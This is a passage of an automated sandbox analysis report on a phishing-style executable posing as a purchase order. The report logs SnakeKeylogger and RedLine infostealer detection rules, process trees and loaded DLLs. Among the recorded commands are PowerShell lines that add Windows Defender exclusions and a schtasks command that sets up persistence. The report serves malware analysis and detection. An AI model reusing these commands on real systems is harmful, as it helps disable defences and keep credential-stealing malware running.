                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B0F2042_2_074B0F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B15C842_2_074B15C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B15B842_2_074B15B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B5C4642_2_074B5C46
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: elevation_service.exe0.9.dr | Static PE information: Number of sections : 12 > 10
                  Source: elevation_service.exe.9.dr | Static PE information: Number of sections : 12 > 10
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1426195581.0000000005149000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000000.1363270819.0000000000F7E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIJgI.exe4 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1465820251.000000000B90C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1417300663.000000000137E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe | Binary or memory string: OriginalFilenameIJgI.exe4 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.63bf478.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: pingsender.exe.9.dr, plugin-container.exe.9.dr, private_browsing.exe.9.dr, updater.exe.9.dr, Au3Info.exe.9.dr, Au3Info_x64.exe.9.dr, AutoIt3Help.exe.9.dr, armsvc.exe.9.dr, alg.exe.9.dr, AppVClient.exe.9.dr, DiagnosticsHub.StandardCollector.Service.exe.9.dr, AutoIt3_x64.exe.9.dr, SciTE.exe.9.dr, AdobeARMHelper.exe.9.dr, jaureg.exe.9.dr, jucheck.exe.9.dr, jusched.exe.9.dr, java.exe.9.dr, javaw.exe.9.dr, javaws.exe.9.dr, GoogleCrashHandler.exe.9.dr, FXSSVC.exe.9.dr, elevation_service.exe.9.dr, elevation_service.exe0.9.dr, maintenanceservice.exe.9.dr, msdtc.exe.9.dr, GoogleCrashHandler64.exe.9.dr, GoogleUpdate.exe.9.dr, GoogleUpdateBroker.exe.9.dr, GoogleUpdateComRegisterShell64.exe.9.dr, GoogleUpdateCore.exe.9.dr, GoogleUpdateOnDemand.exe.9.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr, jabswitch.exe.9.dr, java-rmi.exe.9.dr, msiexec.exe.9.dr, PerceptionSimulationService.exe.9.dr, perfhost.exe.9.dr, Locator.exe.9.dr, MsSense.exe.9.dr, SensorDataService.exe.9.dr, snmptrap.exe.9.dr, Spectrum.exe.9.dr, ssh-agent.exe.9.dr, java.exe0.9.dr, javacpl.exe.9.dr, javaw.exe0.9.dr, javaws.exe0.9.dr, jjs.exe.9.dr, jp2launcher.exe.9.dr, keytool.exe.9.dr, kinit.exe.9.dr, klist.exe.9.dr, ktab.exe.9.dr, TieringEngineService.exe.9.dr, AgentService.exe.9.dr, vds.exe.9.dr, VSSVC.exe.9.dr, wbengine.exe.9.dr, WmiApSrv.exe.9.dr, wmpnetwk.exe.9.dr, orbd.exe.9.dr  Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, YRtQgzFlDnVSru.exe.0.dr  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr  Static PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs  Cryptographic APIs: 'CreateDecryptor'
                  Source: classification engine  Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@36/178@44/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  Code function: 42_2_004019F0 OleInitialize,_getenv,CreateToolhelp32Snapshot,Module32First,CloseHandle,_malloc,_memset,_memset,_malloc,_memset,LoadLibraryA,SafeArrayDestroy,42_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  Code function: 9_2_00F6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,9_2_00F6CBD0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe  File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe  File created: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                  Source: C:\Windows\System32\alg.exe  Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-f1a1dcf99c90d8299ea72c54-b
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-f1a1dcf99c90d829-inf
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe  Mutant created: \Sessions\1\BaseNamedObjects\eRbCIIGBDGKZR
                  Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-f1a1dcf99c90d8299e7986a9-b
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe  File created: C:\Users\user\AppData\Local\Temp\tmpE707.tmp
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007915000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.00000000078E6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.00000000078F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.00000000078D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007909000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078A6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078B6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078E5000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2688454630.00000000087CB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078D9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile read: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeJump to behavior
                  Source: unknown | Process created: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknown | Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                  Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknown | Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                  Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: unknown | Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                  Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: unknown | Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                  Source: unknown | Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknown | Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: windowscodecs.dll
